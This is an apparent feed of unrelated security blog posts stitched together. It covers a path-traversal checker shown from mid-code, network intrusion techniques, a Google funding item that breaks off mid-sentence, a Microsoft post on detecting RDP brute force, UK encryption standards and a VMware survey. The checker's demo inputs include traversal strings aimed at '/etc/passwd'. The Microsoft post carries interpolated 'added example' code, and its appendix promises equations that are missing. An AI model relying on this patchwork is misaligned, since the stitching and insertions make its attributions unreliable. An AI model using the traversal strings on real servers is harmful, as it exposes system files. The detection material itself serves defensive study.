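    normalise away '.' and '..', and finally require the result to still lie
    under the document root. Raises ValueError on anything that escapes."""
    decoded = unquote(requested)
    if "\x00" in decoded:
        raise ValueError("NUL byte in requested path")
    if decoded.startswith("/"):
        raise ValueError("absolute path rejected")
    root = posixpath.normpath(doc_root)
    candidate = posixpath.normpath(posixpath.join(root, decoded))
    if candidate != root and not candidate.startswith(root + "/"):
        raise ValueError("requested path escapes the document root")
    return candidate


def is_safe(doc_root, requested):
    """Convenience wrapper: True if the hardened resolver accepts the request."""
    try:
        resolve_checked(doc_root, requested)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed inputs: a legitimate file, a plain traversal and a URL-encoded one.
    for req in ("reports/q3.html", "../../../etc/passwd", "%2e%2e/%2e%2e/%2e%2e/etc/passwd"):
        print(f"{req:40} unchecked -> {resolve_unchecked(DOC_ROOT, req):30} safe={is_safe(DOC_ROOT, req)}")
```

The check is purely string-based: it stops traversal via `..` and encoded `..`, but it does not see symlinks that already live under the document root. In a real handler, resolve the candidate with `os.path.realpath` and compare against the realpath of the root, or better, serve only names from an explicit allow-list.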

Protocol Specific Attacks

Devices speaking common network protocols such as TCP, ARP, IP, UDP and ICMP inherit those protocols’ weaknesses, which attackers can abuse for intrusion, e.g. ARP spoofing to mount a man-in-the-middle attack.

Attackers commonly cover up their intrusions so that enterprises are unable to detect them, using techniques such as deleting access logs, encrypting stolen data before exfiltration or installing rootkits to hide their activity from cybersecurity teams.

The most effective way for enterprises to prevent and act against network intrusions is to deploy an Intrusion Detection or Prevention System. An Intrusion Detection System (IDS) monitors all incoming and outgoing network activity and identifies any signs of intrusion in systems that could jeopardize the business. An Intrusion Prevention System (IPS) is a step ahead of an IDS in its capabilities: it both detects and blocks anomalies on a company’s network. An IPS is an active control mechanism that monitors the network traffic flow; it identifies and averts vulnerability exploits in the form of malicious inputs that intruders use to disrupt or gain control of an application or system.

Benefits of Seqrite’s UTM solution

Seqrite’s Unified Threat Management (UTM) offers a one-stop solution for all enterprise security needs which includes intrusion detection and prevention as a standard feature.

UTM’s in-built IDS and IPS components keep enterprises safe by:

  • Monitoring, evaluating and catching threats in real-time
  • Preventing Denial of Service (DoS)/Distributed Denial of Service (DDoS) attacks
  • Preventing the discovery of open ports by attackers

Seqrite UTM’s IPS acts as a security barrier against unwanted intrusions into enterprise networks and forestalls a broad range of DoS and DDoS attacks before they penetrate the network.

The post What are the different techniques of intruding networks? appeared first on Seqrite Blog.

Google Offers Financial Support to Open Source Projects for Cybersecurity

Besides rewarding ethical hackers from its pocket for responsibly reporting vulnerabilities in third-party open-source projects, Google today announced financial support for open source developers to help them arrange additional resources, prioritizing the security of their products. The initiative, called "Patch Rewards Program," was launched nearly 6 years ago, under which Google rewards

Data science for cybersecurity: A probabilistic time series model for detecting RDP inbound brute force attacks

Computers with Windows Remote Desktop Protocol (RDP) exposed to the internet are an attractive target for adversaries because they present a simple and effective way to gain access to a network. Brute forcing RDP, a secure network communications protocol that provides remote access over port 3389, does not require a high level of expertise or the use of exploits; attackers can utilize many off-the-shelf tools to scan the internet for potential victims and leverage similar such tools for conducting the brute force attack.

Attackers target RDP servers that use weak passwords and are without multi-factor authentication, virtual private networks (VPNs), and other security protections. Through RDP brute force, threat actor groups can gain access to target machines and conduct many follow-on activities like ransomware and coin mining operations.

In a brute force attack, adversaries attempt to sign in to an account by effectively using one or more trial-and-error methods. Many failed sign-ins occurring over very short time frequencies, typically minutes or even seconds, are usually associated with these attacks. A brute force attack might also involve adversaries attempting to access one or more accounts using valid usernames that were obtained from credential theft or using common usernames like “administrator”. The same holds for password combinations. In detecting RDP brute force attacks, we focus on the source IP address and username, as password data is not available.

In the Windows operating system, whenever an attempted sign-in to a local machine fails, Event Tracing for Windows (ETW) registers Event ID 4625 with the associated username. The source IP addresses of inbound RDP connections are also available; together, this information is very useful in assessing whether a machine is under brute force attack. Using it in combination with Event ID 4624 (successful sign-in) on non-server Windows machines can shed light on which sign-in sessions were successfully created and can further help in detecting whether a local machine has been compromised.

In this blog we’ll present a study and a detection logic that uses these signals. This data science-driven approach to detecting RDP brute force attacks has proven valuable in detecting human adversary activity through Microsoft Threat Experts, the managed threat hunting service in Microsoft Defender Advanced Threat Protection. This work is an example of how the close collaboration between data scientists and threat hunters results in protection for customers against real-world threats.

Insights into brute force attacks

Observing a sudden, relatively large count of Event ID 4625 associated with RDP network connections might be rare, but it does not necessarily imply that a machine is under attack. For example, a script that does the following would look suspicious in a time series of failed sign-in counts but is most likely not malicious:

  • uses an expired password
  • retries sign-in attempts every N-minutes with different usernames
  • over a public IP address within a range owned by the enterprise

In contrast, behavior that includes the following is indicative of an attack:

  • extreme counts of failed sign-ins from many unknown usernames
  • never previously successfully authenticated
  • from multiple RDP connections
  • from new source IP addresses

Understanding the context of failed sign-ins and inbound connections is key to discriminating between true positive (TP) and false positive (FP) brute force attacks, especially if the goal is to automatically raise only high-precision alerts to the appropriate recipients, as we do in Microsoft Defender ATP.

We analyzed several months’ worth of data to mine insights into the types of RDP brute force attacks occurring across Microsoft Defender ATP customers. Out of about 45,000 machines that had both RDP public IP connections and at least 1 network failed sign-in, we discovered that, on average, several hundred machines per day had high probability of undergoing one or more RDP brute force attack attempts. Of the subpopulation of machines with detected brute force attacks, the attacks lasted 2-3 days on average, with about 90% of cases lasting for 1 week or less, and less than 5% lasting for 2 weeks or more.

Figure 1: Empirical distribution in number of days per machine where we observed 1 or more brute force attacks

As discussed in numerous other studies [1], large counts of failed sign-ins are often associated with brute force attacks. Looking at the count of daily failed sign-ins, 90% of cases exceeded 10 attempts, with a median larger than 60. In addition, these unusual daily counts had a high positive correlation with extreme counts in shorter time windows (see Figure 2). In fact, the bulk of a day’s extreme failed sign-ins typically arrived within a 2-hour window, and in about 40% of cases within 30 minutes.

Figure 2: Count of daily and maximum hourly network failed sign-ins for a local machine under brute force attack

While a detection logic based on thresholding the count of failed sign-ins during daily or finer grain time window can detect many brute force attacks, this will likely produce too many false positives. Worse, relying on just this will yield false negatives, missing successful enterprise compromises: our analysis revealed several instances where brute force attacks generated less than 5-10 failed attempts at a daily granularity but often persisted for many days, thereby avoiding extreme counts at any point in time. For such a brute force attack, thresholding the cumulative number of failed sign-ins across time could be more useful, as depicted in Figure 3.

Figure 3: Daily and cumulative failed network sign-in

Looking at counts of network failed sign-ins provides a useful but incomplete picture of RDP brute force attacks. This can be further augmented with additional information on the failed sign-in, such as the failure reason, time of day, and day of week, as well as the username itself. An especially strong signal is the source IP of the inbound RDP connection. Knowing if the external IP has a high reputation of abuse, as can be looked up on sites like https://www.abuseipdb.com/, can directly confirm if an IP is a part of an active brute force.

Unfortunately, not all IP addresses have a history of abuse; in addition, it can be expensive to retrieve information about many external IP addresses on demand. Maintaining a list of suspicious IPs is an option, but relying on this can result in false negatives as, inevitably, new IPs continually occur, particularly with the adoption of cloud computing and ease of spinning up virtual machines. A generic signal that can augment failed sign-in and user information is counting distinct RDP connections from external IP addresses. Again, extreme values occurring at a given time or cumulated over time can be an indicator of attack.

Figure 4 shows histograms (i.e., counts put into discrete bins) of daily counts of RDP public connections per machine that occurred for an example enterprise with known brute force attacks. It’s evident that normal machines have a lower probability of larger counts compared to machines attacked.

Figure 4: Histograms of daily count of RDP inbound across machines for an example enterprise

Given that some enterprises have machines under brute force attack daily, the priority may be to focus on machines that have been compromised, defined by a first successful sign-in following failed attempts from suspicious source IP addresses or unusual usernames. In Windows logs, Event ID 4624 can be leveraged to measure successful sign-in events for local machine in combination with failed sign-ins (Event ID 4625).

Out of the hundreds of machines with RDP brute force attacks detected in our analysis, we found that about .08% were compromised. Furthermore, across all enterprises analyzed over several months, on average about 1 machine was detected with high probability of being compromised resulting from an RDP brute force attack every 3-4 days. Figure 5 shows a bubble chart of the average abuse score of external IPs associated with RDP brute force attacks that successfully compromised machines. The size of the bubbles is determined by the count of distinct machines across the enterprises analyzed having a network connection from each IP. While there is diversity in the origin of the source IPs, Netherlands, Russia, and the United Kingdom have a larger concentration of inbound RDP connections from high-abuse IP.

Figure 5: Bubble chart of IP abuse score versus counts of machine with inbound RDP

A key takeaway from our analysis is that successful brute force attempts are not uncommon; therefore, it’s critical to monitor at least the suspicious connections and unusual failed sign-ins that result in authenticated sign-in events. In the following sections we describe a methodology to do this. This methodology was leveraged by Microsoft Threat Experts to augment threat hunting and resulted in new targeted attack notifications.

Combining many relevant signals

As discussed earlier (with the example of scripts connecting via RDP using outdated passwords yielding failed sign-ins), simply relying on thresholding failed attempts per machine for detecting brute force attacks can be noisy and may result in many false positives. A better strategy is to utilize many contextually relevant signals, such as:

  • the timing, type, and count of failed sign-in
  • username history
  • type and frequency of network connections
  • first-time username from a new source machine with a successful sign-in

This can be even further extended to include indicators of attack associated with brute force, such as port scanning.

Combining multiple signals along the attack chain has been proposed and shown promising results [2]. We considered the following signals in detecting RDP inbound brute force attacks per machine:

  • hour of day and day of week of failed sign-in and RDP connections
  • timing of successful sign-in following failed attempts
  • Event ID 4625 login type (filtered to network and remote interactive)
  • Event ID 4625 failure reason (filtered to %%2308, %%2312, %%2313)
  • cumulative count of distinct username that failed to sign in without success
  • count (and cumulative count) of failed sign-ins
  • count (and cumulative count) of RDP inbound external IP
  • count of other machines having RDP inbound connections from one or more of the same IP
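Most of the signals above can be derived directly from the two event IDs the post relies on. What follows is an added example, not code from the Microsoft post, that computes a subset of them from constructed 4625/4624 records: per-day failed sign-in counts (filtered to logon types 3 and 10 and to the three failure-reason codes listed above, used here as opaque strings), cumulative counts, distinct failing usernames, distinct inbound IPs, the peak hourly count, and the "first success after failures from the same source" condition used to define a compromised machine. The sample events, addresses and usernames are made up.

```python
from collections import defaultdict
from datetime import datetime

# Constructed sample records (not real telemetry). Each mirrors the 4625/4624
# fields the post relies on; "source_ip" stands in for the inbound RDP address.
# 198.51.100.20 plays an internal script with an expired password;
# 203.0.113.7 and 203.0.113.9 play external brute-force sources.
EVENTS = [
    {"time": "2019-08-03 09:00:00", "event_id": 4625, "user": "svc_backup",    "logon_type": 3,  "status": "%%2313", "source_ip": "198.51.100.20"},
    {"time": "2019-08-03 09:15:00", "event_id": 4625, "user": "svc_backup",    "logon_type": 3,  "status": "%%2313", "source_ip": "198.51.100.20"},
    {"time": "2019-08-03 09:30:00", "event_id": 4625, "user": "jsmith",        "logon_type": 2,  "status": "%%2313", "source_ip": "127.0.0.1"},    # console logon, filtered out
    {"time": "2019-08-04 02:10:05", "event_id": 4625, "user": "Administrator", "logon_type": 10, "status": "%%2313", "source_ip": "203.0.113.7"},
    {"time": "2019-08-04 02:10:09", "event_id": 4625, "user": "admin",         "logon_type": 10, "status": "%%2313", "source_ip": "203.0.113.7"},
    {"time": "2019-08-04 02:10:14", "event_id": 4625, "user": "test",          "logon_type": 10, "status": "%%2313", "source_ip": "203.0.113.7"},
    {"time": "2019-08-04 02:10:20", "event_id": 4625, "user": "user1",         "logon_type": 10, "status": "%%2313", "source_ip": "203.0.113.7"},
    {"time": "2019-08-04 02:10:25", "event_id": 4625, "user": "guest",         "logon_type": 10, "status": "%%2310", "source_ip": "203.0.113.7"},  # reason outside the filter
    {"time": "2019-08-04 03:40:00", "event_id": 4625, "user": "administrator", "logon_type": 10, "status": "%%2313", "source_ip": "203.0.113.9"},
    {"time": "2019-08-04 03:41:30", "event_id": 4624, "user": "admin",         "logon_type": 10, "status": None,     "source_ip": "203.0.113.7"},
]

LOGON_TYPES = {3, 10}                             # 3 = Network, 10 = RemoteInteractive
FAILURE_REASONS = {"%%2308", "%%2312", "%%2313"}  # the reason codes listed in the post


def parse(events):
    """Attach a datetime to each record and return them in time order."""
    parsed = [{**e, "ts": datetime.strptime(e["time"], "%Y-%m-%d %H:%M:%S")} for e in events]
    return sorted(parsed, key=lambda e: e["ts"])


def is_network_failure(e):
    """A 4625 that passes the logon-type and failure-reason filters."""
    return e["event_id"] == 4625 and e["logon_type"] in LOGON_TYPES and e["status"] in FAILURE_REASONS


def daily_signals(events):
    """Per-day point and cumulative counts of the failed-sign-in signals."""
    per_day = defaultdict(lambda: {"failed": 0, "users": set(), "ips": set(), "hours": defaultdict(int)})
    for e in parse(events):
        if not is_network_failure(e):
            continue
        day = per_day[e["ts"].date().isoformat()]
        day["failed"] += 1
        day["users"].add(e["user"].lower())       # usernames are case-insensitive on Windows
        day["ips"].add(e["source_ip"])
        day["hours"][e["ts"].hour] += 1
    rows, cum_users, cum_failed = [], set(), 0
    for day in sorted(per_day):
        d = per_day[day]
        cum_users |= d["users"]
        cum_failed += d["failed"]
        rows.append({
            "day": day,
            "failed": d["failed"],
            "cum_failed": cum_failed,
            "distinct_users": len(d["users"]),
            "cum_distinct_users": len(cum_users),
            "distinct_ips": len(d["ips"]),
            "peak_hour_failed": max(d["hours"].values()),
        })
    return rows


def first_success_after_failures(events, known_good_users):
    """Flag a 4624 whose source IP produced earlier filtered 4625s and whose
    username has never authenticated before (the post's compromise condition).
    Returns (timestamp, source_ip, username, prior failures from that IP)."""
    failed_from = defaultdict(int)
    succeeded = {u.lower() for u in known_good_users}
    hits = []
    for e in parse(events):
        if is_network_failure(e):
            failed_from[e["source_ip"]] += 1
        elif e["event_id"] == 4624 and e["logon_type"] in LOGON_TYPES:
            user = e["user"].lower()
            if failed_from[e["source_ip"]] > 0 and user not in succeeded:
                hits.append((e["ts"].isoformat(sep=" "), e["source_ip"], user, failed_from[e["source_ip"]]))
            succeeded.add(user)
    return hits


if __name__ == "__main__":
    for row in daily_signals(EVENTS):
        print(row)
    print(first_success_after_failures(EVENTS, known_good_users=["svc_backup", "jsmith"]))
```

The internal script on 2019-08-03 produces two failures from one username and one enterprise address, while the 2019-08-04 activity shows four distinct usernames from two new addresses followed by a successful `admin` logon from the address that generated the failures; that last row is the one worth paging on. Production use would add the "other machines seeing the same IP" signal, which needs cross-host data.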

Unsupervised probabilistic time series anomaly detection

For many cybersecurity problems, including detecting brute force attacks, previously labeled data is not usually available. Thus, training a supervised learning model is not feasible. This is where unsupervised learning is helpful, enabling one to discover and quantify unknown behaviors when examples are too sparse. Given that several of the signals we consider for modeling RDP brute force attacks are inherently dependent on values observed over time (for example, daily counts of failed sign-ins and counts of inbound connections), time series models are particularly beneficial. Specifically, time series anomaly detection naturally provides a logical framework to quantify uncertainty in modeling temporal changes in data and produce probabilities that then can be ranked and thresholded to control a desirable false positive rate.

Time series anomaly detection captures the temporal dynamics of signals and quantifies the probability of observing values at any point in time under normal operating conditions. More formally, if we introduce the notation Y(t) to denote the signals taking on values at time t, then we build a model to compute reliable estimates of the probability of Y(t) exceeding the observed value y(t) given all known and relevant information, represented by P[y(t)] and sometimes called an anomaly score. Given a false positive tolerance rate r (e.g., 0.1%, i.e. 1 out of 1,000 per time step), for each time t the values y*(t) satisfying P[y*(t)] < r are detected as anomalous. Assuming the right signals, reflecting the relevant behaviours of the type of attack, are chosen, the idea is simple: the lowest anomaly scores at each time step are the ones most likely to correspond to real threats.

For example, looking back at Figure 2, the time series of daily count of failed sign-ins occurring on the brute force attack day 8/4/2019 had extreme values that would be associated with an empirical probability of about .03% out of all machine and days with at least 1 failed network sign-in for the enterprise.

As discussed earlier, applying anomaly detection to 1 or a few signals to detect real attacks can yield too many false positives. To mitigate this, we combined anomaly scores across eight signals we selected to model RDP brute force attack patterns. The details of our solution are included in the Appendix, but in summary, our methodology involves:

  • updating statistical discrete time series models sequentially for each signal, capturing time of day, day of week, and both point and cumulative effects
  • combining anomaly scores using an approach that yields accurate probability estimates, and
  • ranking the top N anomalies per day to control a desired number of false positives

Our approach to time series anomaly detection is computationally efficient and automatically updates its probabilities to adapt to changes in the data.

As we describe in the next section, this approach has yielded successful attack detection at high precision.

Protecting customers from real-world RDP brute force attacks through Microsoft Threat Experts

The proposed time series anomaly detection model was deployed and utilized by Microsoft Threat Experts to detect RDP brute force attacks during threat hunting activities. A list that ranks machines across enterprises with the lowest anomaly scores (indicating the likelihood of observing a value at least as large under expected conditions in all signals considered) is updated and reviewed every day. See Table 1 for an example.

Table 1: Sample ranking of detected RDP inbound brute force attacks

For each machine with detection of a probable brute force attack, each instance is assigned TP, FP, or unknown. Each TP is then assigned priority based on the severity of the attack. For high-priority TP, a targeted attack notification is sent to the associated organization with details about the active brute force attack and recommendations for mitigating the threat; otherwise the machine is closely monitored until more information is available.

We also added an extra capability to our anomaly detection: automatically sending targeted attack notifications about RDP brute force attacks, in many cases before the attack succeeds or before the actor is able to conduct further malicious activities. Looking at the most recent sample of about two weeks of graded detections, the average precision per day (i.e., the fraction of graded detections that were true positives) is approximately 93.7% at a conservative false positive rate of 1%.

In conclusion, based on our careful selection of signals found to be highly associated with RDP brute force attacks, we demonstrated that proper application of time series anomaly detection can be very accurate in identifying real threats. We have filed a patent application for this probabilistic time series model for detecting RDP inbound brute force attacks. In addition, we are working on integrating this capability into Microsoft Defender ATP’s endpoint detection and response (EDR) capabilities so that the detection logic can raise alerts on RDP brute force attacks in real time.

Monitoring suspicious activity in failed sign-ins and network connections should be taken seriously—a real-time anomaly detection capable of self-updating with the changing dynamics in a network can indeed provide a sustainable solution. While Microsoft Defender ATP already has many anomaly detection capabilities integrated into its EDR capabilities, which enrich advanced threat protection across the broader Microsoft Threat Protection, we will continue to enhance these detections to cover more security scenarios. Using data science, we will continue to combine robust statistical and machine learning approaches with threat expertise and intelligence to deliver industry-leading protection to our customers through Microsoft Threat Protection.


Cole Sodja, Justin Carroll, Joshua Neil
Microsoft Defender ATP Research Team


Appendix 1: Models formulation

We utilize hierarchical zero-adjusted negative binomial dynamic models to capture the characteristics of the highly discrete count time series. Specifically, as shown in Figure 2, it’s expected that most of the time there won’t be failed sign-ins for valid credentials on a local machine; hence, there are excess zeros that would not be explained by standard probability distributions such as the negative binomial. In addition, the variance of non-zero counts is often much larger than the mean, where for example, valid scripts connecting via RDP can generate counts in the 20s or more over several minutes because of an outdated password. Moreover, given a combination of multiple users or scripts connecting to shared machines at the same time, this can generate more extreme counts at higher quantiles resulting in heavier tails, as seen in Figure 6.

Figure 6: Daily count of network failed sign-in for a machine with no brute force attack

Parametric discrete location/scale distributions do not generate well-calibrated p-values for rare time series, as seen in Figure 6, and thus if used to detect anomalies can result in too many FPs when looking across many machines at high time frequencies. To overcome this challenge dealing with the sparse time series of counts of failed sign-in and RDP inbound public connections we specify a mixture model, where, based on our analysis, a zero-inflated two-component negative binomial distribution was adequate.

Our formulation is based on thresholding values that determine when to transition to a distribution with larger location and/or scale as given in Equation 1. Hierarchical priors are given from empirical estimates of the sample moments across machines using about 1 month of data.

Equation 1: Zero-adjusted negative binomial threshold model

Negative binomial distribution (NB):

To our knowledge, this formulation does not yield a conjugate prior, and so directly computing probabilities from the posterior predicted density is not feasible. Instead, anomaly scores are generated based on drawing samples from all distributions and then computing the empirical right-tail p-value.

Updating parameters is done based on applying exponential smoothing. To avoid outliers skewing estimates, such as machines under brute force or other attacks, trimming is applied to sample from the distribution at a specified false positive rate, which was set to .1% for our study. Algorithm 1 outlines the logic.

The smoothing parameters were learned based on maximum likelihood estimation and then fixed during each new sequential update. To induce further uncertainty, bootstrapping across machines is done to produce a histogram of smoothing weights, and samples are drawn in accordance to their frequency. We found that weights concentrated away from 0 vary between .06% and 8% for over 90% of machines, thus leading to slow changes in the parameters. An extension using adaptive forgetting factors will be considered in future work to automatically learn how to correct smoothing in real time.

Algorithm 2: Updating model parameters real-time

Appendix 2: Fisher Combination

For a given device, a score is computed for each available signal, defined as a p-value, where lower values indicate a higher likelihood of an anomaly. The p-values are then combined into a joint score across all signals using Fisher’s p-value combination method, as follows:

The use of Fisher’s test applied to anomaly scores produces a scalable solution that yields interpretable probabilities that thus can be controlled to achieve a desired false positive rate. This has even been applied in a cybersecurity context. [3]
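The three steps summarised in the body of the post (a right-tail anomaly score per signal, a probability-preserving combination, and a ranked list thresholded at a tolerated false positive rate) and the Fisher combination described in this appendix can be shown together in a few dozen lines. The following is an added example, not code from the Microsoft post or from Microsoft Defender ATP. Fisher's statistic X = -2 Σ ln p_i follows a chi-square distribution with 2k degrees of freedom when the k p-values are independent; for even degrees of freedom that distribution's survival function has a closed form, so no statistics library is needed. In place of draws from the fitted zero-adjusted negative binomial models, the example scores today's observation against a constructed 30-day baseline of counts per signal (an assumption made for self-containment, not the post's method).

```python
import math


def right_tail_pvalue(baseline, y):
    """Empirical right-tail p-value P[Y >= y] against a baseline sample of
    counts, with add-one smoothing so a value beyond every baseline point still
    gets a small non-zero score instead of 0."""
    n_at_least = sum(1 for b in baseline if b >= y)
    return (1 + n_at_least) / (1 + len(baseline))


def chi2_sf_even_df(x, k):
    """Survival function P[X > x] of a chi-square variable with 2k degrees of
    freedom. For even degrees of freedom it has the closed form
    exp(-x/2) * sum_{j=0}^{k-1} (x/2)^j / j!"""
    half = x / 2.0
    term, total = 1.0, 0.0
    for j in range(k):
        total += term
        term *= half / (j + 1)
    return math.exp(-half) * total


def fisher_combine(pvalues):
    """Fisher's method: X = -2 * sum(ln p_i) is chi-square with 2k degrees of
    freedom under independence; return P[X > observed], itself a p-value."""
    clipped = [min(max(p, 1e-300), 1.0) for p in pvalues]  # guard log(0)
    stat = -2.0 * sum(math.log(p) for p in clipped)
    return chi2_sf_even_df(stat, len(clipped))


def score_machine(observed, baselines, r):
    """Per-signal p-values, their Fisher combination, and the alert decision at
    false positive tolerance r."""
    per_signal = {name: right_tail_pvalue(baselines[name], value)
                  for name, value in observed.items()}
    combined = fisher_combine(list(per_signal.values()))
    return {"per_signal": per_signal, "combined": combined, "alert": combined < r}


def rank_machines(observations, baselines, top_n):
    """Lowest combined score first, mirroring the daily ranked list analysts review."""
    scored = [(name, score_machine(obs, baselines, 1.0)["combined"])
              for name, obs in observations.items()]
    scored.sort(key=lambda item: item[1])
    return scored[:top_n]


# Constructed 30-day baselines per signal: daily failed network sign-ins,
# distinct failing usernames, distinct inbound RDP IPs. The lone 25 is the
# kind of benign spike an expired-password script produces.
BASELINES = {
    "failed_signins": [0] * 20 + [1, 2, 1, 3, 0, 4, 1, 2, 25, 1],
    "distinct_users": [0] * 22 + [1, 1, 2, 1, 1, 1, 3, 1],
    "inbound_ips":    [0] * 18 + [1] * 10 + [2, 2],
}

# Constructed observations for two hosts on the same day.
OBSERVATIONS = {
    "attacked-host": {"failed_signins": 60, "distinct_users": 25, "inbound_ips": 3},
    "normal-host":   {"failed_signins": 2,  "distinct_users": 1,  "inbound_ips": 1},
}

if __name__ == "__main__":
    for host, combined in rank_machines(OBSERVATIONS, BASELINES, top_n=10):
        print(f"{host:15} combined p = {combined:.5f}  alert at 1% = {combined < 0.01}")
```

Two caveats a practitioner should keep in mind. Fisher's method assumes the per-signal p-values are independent; failed-sign-in counts and distinct-username counts are clearly correlated, so the combined value is optimistic and the tolerance r should be set with graded detections in hand, as the post does. And the add-one smoothing in `right_tail_pvalue` caps how small a single signal's p-value can get (1/31 here), which is why a handful of signals must agree before the combined score drops below a 1% threshold.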


[1] Najafabadi et al., "Machine Learning for Detecting Brute Force Attacks at the Network Level," 2014 IEEE 14th International Conference on Bioinformatics and Bioengineering, 2014.
[2] Sexton et al., "Attack chain detection," Statistical Analysis and Data Mining, 2015.
[3] Heard, "Combining Weak Statistical Evidence in Cyber Security," Intelligent Data Analysis XIV, 2015.


The post Data science for cybersecurity: A probabilistic time series model for detecting RDP inbound brute force attacks appeared first on Microsoft Security.

The Challenges of UK Cyber Security Standards

Article by Matt Cable, VP Solutions Architect and MD Europe, Certes Networks

Public sector organisations in the UK are in the midst of changing cyber security regulations. In mid-2018, the Government, in collaboration with the NCSC, published a minimum set of cyber security standards. These standards are now mandated, along with a focus on continually “raising the bar”. The standards set minimum requirements for organisations to protect sensitive information and key operational services, which – given the way in which these services are increasingly dispersed – is driving significant changes in public sector network architecture and security.

In addition to setting today’s ‘minimum’ standards, however, the guidance also sets a target date of 2023 by which public sector organisations will be expected to have adopted a ‘gold-standard’ cyber security profile. Matt Cable, VP Solutions Architect and MD Europe, Certes Networks, therefore outlines the essential considerations that will help organisations select an encryption solution provider that can easily integrate into any network infrastructure as they migrate from Legacy MPLS to SDN or SD-WAN network architectures.

The Principles
For both public and private sector organisations, customer experience is key. From finance and utilities, to local authorities and smart cities, customer touchpoints are increasingly dispersed, remote and application-driven, necessitating a move from Legacy MPLS to SDN or SD-WAN. However, under the Government’s new minimum cyber security standards framework, ensuring sensitive information and key services are protected is a critical consideration.

The UK’s National Cyber Security Centre (NCSC) has therefore issued principles for cyber secure enterprise technology to organisations, including guidance on deploying and buying network encryption, with the aim of reducing risks to the UK by securing public and private sector networks. This guidance bears parallels with the US National Institute of Standards and Technology’s (NIST) Cybersecurity Framework and therefore applies equally to US and other federal organisations in a similar scenario.

Similar to the NIST framework, the NCSC guidance shares the same principle that networks should not be trusted. It recommends that to keep sensitive information protected, encryption should be used between devices, the applications on them, and the services being accessed. IPsec is the recommended method for protecting all data travelling between two points on a network to provide an understood level of security, with further guidance outlining a specific ‘gold-standard’ cipher suite profile known as PRIME.

The guidance is based on the network vendor being CAS(T) certified (CESG (Communications Electronics Security Group) Assured Services (Telecommunications)), which involves an independent assessment focused on the key security areas of service availability, insider attack, unauthorised access to the network and physical attack.

However, there are challenges.

Challenge #1 – Public Sector Adherence to CAS(T)
Many public sector organisations are no longer mandating CAS(T) based services, and the risk appetite is therefore expected to be lowered, mainly to support the emergence of internet and SD-WAN suppliers’ network solutions. This is key because the current NCSC Foundation standards for IPsec will expire in 2023, and users are being encouraged to move quickly off legacy platforms.

Challenge #2 – Impact to Cloud Service Providers and Bearer Networks
This guidance, such as the protection of information flows on dedicated links between organisations, also applies to cloud service providers, or in the inter-data-centre connections in such providers' networks.

The underlying bearer network is assumed not to provide any security or resilience. This means that any bearer network (such as the Internet, Wi-Fi 4/5G, or a commercial MPLS network) can be used. The choice of bearer network(s) will have an impact on the availability that an encrypted service can provide.

Challenge #3 – Partner Collaboration
NCSC explicitly states in its guidance that establishing trustworthy encrypted network links is not just about technology. It is also important that the management of these network links is carried out by appropriate individuals, performing their assigned management activities in a competent and trusted fashion, from a management system that protects the overall integrity of the system. Thus, for encryption solution providers, the partner’s service credentials affect how the end user may use the technology.

The Solution
IPsec helps protect the confidentiality and integrity of information as it travels across less-trusted networks, by implementing network-based encryption to establish Virtual Private Networks (VPNs).

Under PRIME principles, devices which implement cryptographic protection of information using IPsec should:

  • Be managed by a competent authority in a manner that does not undermine the protection they provide, from a suitable management platform
  • Be configured to provide effective cryptographic protection
  • Use certificates as a means of identifying and trusting other devices, using a suitable PKI
  • Be independently assured to Foundation Grade, and operated in accordance with published Security Procedures
  • Be initially deployed in a manner that ensures their future trustworthiness
  • Be disposed of securely
Keeping the network design simple is one of the most effective ways to ensure the network provides the expected security and performance. The use of certificates generated in a cryptographically secure manner allows VPN gateways and clients to successfully identify themselves to each other while helping to mitigate brute force attacks.

Conclusion
There are many encryption solutions to help agencies and federal governments who want to move from Legacy MPLS to SDN or SD-WAN. Layer 4 encryption, for example, can integrate easily into any network and encrypt data in transit without disrupting performance or replacing the current network architecture.

Selecting a provider that can offer a PRIME compliant solution – such as Layer 4 encryption – is key to conforming to both today’s and tomorrow’s cybersecurity standards. And with NCSC starting to treat all networks as untrusted (especially for agencies using the internet), PRIME is becoming the gold standard against which NCSC will measure regulatory compliance.

Therefore, it is important to consider a vendor that can offer a security solution that is not only compliant but is simple and uncomplicated, minimising disruption, resources and costs.

Broken Security? Most Business Leaders aren’t confident about their Cybersecurity

Cybersecurity is a critical battleground for UK businesses today, as the digital footprints of individuals and enterprises continue to grow. However, according to a new study commissioned by VMware in partnership with Forbes Insights, only a quarter (25%) of business leaders across EMEA are confident in their current cybersecurity practices, and in the UK spending without an adequate assessment of organisational needs is now commonplace.

VMware research reveals British businesses battle sophisticated security threats with old tools and misplaced spend

Key findings of the Study
  • 78% of UK business and IT security leaders believe the cybersecurity solutions their organisation is working with are outdated (despite 40% having acquired new tools over the past 12 months to address potential threats)
  • 74% reveal plans to invest even more in detecting and identifying attacks in the next three years, despite having a multitude of products already installed – a quarter (26%) of businesses currently have 26 or more products for this
  • Only 16% state extreme confidence in the readiness of their organisation to address emerging security challenges
The research shows UK businesses are trapped in a routine of spending without adequately assessing the needs of their organisation. Three quarters (78%) of business and IT security leaders believe the cybersecurity solutions their organisation is working with are outdated, despite 40% having acquired new tools over the past year to address potential threats. Nearly three quarters (74%), meanwhile, reveal plans to invest even more in detecting and identifying attacks in the next three years, despite having a multitude of products already installed – a quarter (26%) of businesses currently have 26 or more products across their enterprises for this.

The apparent hope of UK businesses to spend their way out of security crises is coupled with a significant security skills gap: just 16% of UK respondents state extreme confidence in the readiness of their organisation to address emerging security challenges, with only 14% extremely confident in the readiness of their people and talent.

The result is that, despite British businesses shoring up their defences against an evolving threat landscape, the complexity surrounding multiple cybersecurity solutions is making it harder for organisations to respond, urgently adapt or improve their strategies. In fact, a third (34%) of IT security leaders state it can take up to an entire week to address an issue.

Ian Jenkins, Director, Networking and Security UK & Ireland, VMware, said of the findings: “Businesses across the UK and beyond continue to follow the same IT security paths, and yet expect to see different results. Yet we now live in a world of greater complexity, with more and more intricate interactions, more connected devices and sensors, dispersed workers and the cloud, all of which have created an exponentially larger attack surface. Investment in traditional security solutions continues to be dwarfed by the economic repercussions of breaches.”

The lack of confidence highlighted in this study sits within a chasm forming between business leaders and security teams. In the UK, only a quarter (24%) of IT teams consider C-suite executives in their organisation to be ‘highly collaborative’ when it comes to cybersecurity. Across EMEA, meanwhile, only 27% of executives and only 16% of IT security practitioners say they are collaborating in a significant way to address cybersecurity issues.

